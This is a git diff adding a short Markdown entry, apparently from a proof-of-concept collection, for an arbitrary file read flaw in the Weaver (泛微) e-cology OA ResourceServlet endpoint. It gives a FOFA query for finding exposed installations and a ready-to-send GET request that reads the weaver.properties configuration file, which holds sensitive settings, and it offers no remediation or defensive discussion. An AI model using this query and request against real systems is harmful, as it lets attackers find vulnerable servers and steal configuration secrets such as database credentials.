diff --git a/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md b/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md
new file mode 100644
index 0000000..4cf94c4
--- /dev/null
+++ b/泛微-OA系统ResourceServlet接口任意文件读取漏洞.md
@@ -0,0 +1,11 @@
+## 泛微-OA系统ResourceServlet接口任意文件读取漏洞
+
+## fofa
+```
+app="泛微-OA(e-cology)"
+```
+
+## poc
+```
+GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties HTTP/1.1
+```